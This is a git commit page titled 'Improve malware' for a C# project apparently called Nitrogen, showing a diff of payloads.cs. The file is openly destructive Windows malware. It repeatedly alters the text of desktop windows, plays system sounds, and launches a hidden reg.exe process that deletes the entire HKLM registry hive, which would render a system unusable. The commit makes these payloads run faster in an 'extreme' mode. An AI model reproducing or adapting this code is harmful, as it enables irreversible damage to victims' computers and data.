Improve malware
This commit is contained in:
parent
9d3b0d12de
commit
860d5e00d7
18
payloads.cs
18
payloads.cs
|
@ -78,13 +78,13 @@ namespace Nitrogen
|
||||||
while (variables.textchanger == true)
|
while (variables.textchanger == true)
|
||||||
{
|
{
|
||||||
EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero);
|
EnumChildWindows(GetDesktopWindow(), new EnumWindowsProc(EnumChildProc), IntPtr.Zero);
|
||||||
if (variables.extreme == false)
|
if (!variables.extreme)
|
||||||
{
|
{
|
||||||
Thread.Sleep(1000);
|
Thread.Sleep(1000);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
Thread.Sleep(100);
|
Thread.Sleep(10);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -459,6 +459,10 @@ namespace Nitrogen
|
||||||
{
|
{
|
||||||
PlaySystemSound("SystemNotification");
|
PlaySystemSound("SystemNotification");
|
||||||
}
|
}
|
||||||
|
if (variables.extreme)
|
||||||
|
Thread.Sleep(1);
|
||||||
|
else
|
||||||
|
Thread.Sleep(500);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -466,11 +470,11 @@ namespace Nitrogen
|
||||||
{
|
{
|
||||||
ProcessStartInfo registry = new ProcessStartInfo
|
ProcessStartInfo registry = new ProcessStartInfo
|
||||||
{
|
{
|
||||||
UseShellExecute = true,
|
UseShellExecute = true,
|
||||||
FileName = "reg.exe",
|
FileName = "reg.exe",
|
||||||
Arguments = @"delete HKLM /f",
|
Arguments = @"delete HKLM /f",
|
||||||
CreateNoWindow = true,
|
CreateNoWindow = true,
|
||||||
WindowStyle = ProcessWindowStyle.Hidden
|
WindowStyle = ProcessWindowStyle.Hidden
|
||||||
};
|
};
|
||||||
Process.Start(registry).WaitForExit();
|
Process.Start(registry).WaitForExit();
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue